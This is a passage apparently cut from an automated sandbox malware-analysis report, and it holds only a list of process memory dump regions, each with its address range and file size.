                                                                                          • memory/1736-62-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                            Filesize

                                                                                            292KB

                                                                                          • memory/1736-67-0x0000000000400000-0x0000000000449000-memory.dmp

                                                                                            Filesize

                                                                                            292KB

                                                                                          • memory/1772-349-0x0000000005520000-0x0000000005521000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-362-0x0000000005A90000-0x0000000005A91000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-351-0x0000000004BA2000-0x0000000004BA3000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-350-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-383-0x00000000065F0000-0x00000000065F1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-348-0x0000000002800000-0x0000000002801000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-347-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-346-0x00000000012A0000-0x00000000012A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-369-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-345-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1772-381-0x00000000065E0000-0x00000000065E1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1772-382-0x000000007EF20000-0x000000007EF21000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1900-223-0x0000000000020000-0x000000000002A000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/1900-224-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/1900-221-0x0000000002E70000-0x0000000002E81000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1904-160-0x0000000000060000-0x0000000000061000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1924-314-0x0000000000020000-0x000000000002A000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/1924-312-0x0000000000DA0000-0x0000000000DB1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/1924-315-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/1988-437-0x00000000049B0000-0x00000000049B1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/1988-434-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/1988-435-0x0000000000400000-0x0000000000426000-memory.dmp

                                                                                            Filesize

                                                                                            152KB

                                                                                          • memory/1988-433-0x0000000000400000-0x0000000000426000-memory.dmp

                                                                                            Filesize

                                                                                            152KB

                                                                                          • memory/2028-149-0x0000000073550000-0x00000000736F3000-memory.dmp

                                                                                            Filesize

                                                                                            1.6MB

                                                                                          • memory/2076-330-0x0000000001130000-0x0000000001131000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-331-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-342-0x0000000005880000-0x0000000005881000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-337-0x0000000005510000-0x0000000005511000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-329-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/2076-334-0x0000000004AE2000-0x0000000004AE3000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-333-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2076-332-0x00000000012A0000-0x00000000012A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2096-335-0x00000000012A0000-0x00000000012B1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2124-467-0x0000000002DE0000-0x0000000002DF1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2124-469-0x0000000002C50000-0x0000000002CE1000-memory.dmp

                                                                                            Filesize

                                                                                            580KB

                                                                                          • memory/2124-470-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                            Filesize

                                                                                            584KB

                                                                                          • memory/2132-310-0x0000000000401000-0x000000000040B000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/2164-216-0x000000000C840000-0x000000000C841000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2200-363-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2200-357-0x000000006AFE1000-0x000000006AFE3000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2204-252-0x0000000000A30000-0x0000000000A41000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2244-392-0x00000000008F0000-0x0000000000901000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2244-395-0x0000000000020000-0x000000000002D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/2248-238-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                            Filesize

                                                                                            1.2MB

                                                                                          • memory/2248-237-0x0000000002DF0000-0x0000000002F0A000-memory.dmp

                                                                                            Filesize

                                                                                            1.1MB

                                                                                          • memory/2248-389-0x00000000001D0000-0x00000000002C1000-memory.dmp

                                                                                            Filesize

                                                                                            964KB

                                                                                          • memory/2248-231-0x0000000002DF0000-0x0000000002E01000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2400-455-0x0000000000A10000-0x0000000000A21000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2400-457-0x00000000002A0000-0x000000000030B000-memory.dmp

                                                                                            Filesize

                                                                                            428KB

                                                                                          • memory/2400-458-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                            Filesize

                                                                                            444KB

                                                                                          • memory/2476-248-0x0000000002DC0000-0x0000000002DD1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2544-307-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2664-360-0x0000000001400000-0x0000000001411000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2712-273-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                            Filesize

                                                                                            48KB

                                                                                          • memory/2732-440-0x0000000000B40000-0x0000000000B51000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2732-443-0x0000000000400000-0x0000000000492000-memory.dmp

                                                                                            Filesize

                                                                                            584KB

                                                                                          • memory/2732-442-0x0000000000270000-0x0000000000301000-memory.dmp

                                                                                            Filesize

                                                                                            580KB

                                                                                          • memory/2752-264-0x0000000001F20000-0x0000000001F31000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2848-210-0x0000000000401000-0x000000000040C000-memory.dmp

                                                                                            Filesize

                                                                                            44KB

                                                                                          • memory/2864-212-0x0000000073D61000-0x0000000073D63000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/2864-211-0x0000000000240000-0x0000000000241000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2904-447-0x0000000000B30000-0x0000000000B41000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/2904-450-0x0000000000400000-0x000000000046C000-memory.dmp

                                                                                            Filesize

                                                                                            432KB

                                                                                          • memory/2904-449-0x0000000000220000-0x000000000028B000-memory.dmp

                                                                                            Filesize

                                                                                            428KB

                                                                                          • memory/2912-387-0x00000000000A0000-0x00000000000A6000-memory.dmp

                                                                                            Filesize

                                                                                            24KB

                                                                                          • memory/2912-388-0x00000000000B0000-0x00000000000C0000-memory.dmp

                                                                                            Filesize

                                                                                            64KB

                                                                                          • memory/2912-254-0x0000000000080000-0x0000000000095000-memory.dmp

                                                                                            Filesize

                                                                                            84KB

                                                                                          • memory/2912-386-0x0000000001CF0000-0x0000000001EFF000-memory.dmp

                                                                                            Filesize

                                                                                            2.1MB

                                                                                          • memory/2948-425-0x00000000008A0000-0x00000000008A1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2948-427-0x0000000004C80000-0x0000000004C81000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2948-424-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/2948-429-0x0000000006500000-0x0000000006521000-memory.dmp

                                                                                            Filesize

                                                                                            132KB

                                                                                          • memory/2948-430-0x0000000004C81000-0x0000000004C82000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2948-432-0x0000000001E30000-0x0000000001E31000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/2948-431-0x0000000001EB0000-0x0000000001EBB000-memory.dmp

                                                                                            Filesize

                                                                                            44KB

                                                                                          • memory/2956-262-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                            Filesize

                                                                                            200KB

                                                                                          • memory/2956-257-0x0000000002130000-0x0000000002141000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/3004-459-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3004-277-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                            Filesize

                                                                                            200KB

                                                                                          • memory/3004-445-0x0000000001390000-0x0000000001391000-memory.dmp

                                                                                            Filesize

                                                                                            4KB

                                                                                          • memory/3004-444-0x0000000073010000-0x00000000736FE000-memory.dmp

                                                                                            Filesize

                                                                                            6.9MB

                                                                                          • memory/3004-266-0x0000000001F90000-0x0000000001FA1000-memory.dmp

                                                                                            Filesize

                                                                                            68KB

                                                                                          • memory/3056-411-0x0000000003510000-0x0000000003521000-memory.dmp

                                                                                            Filesize

                                                                                            68KB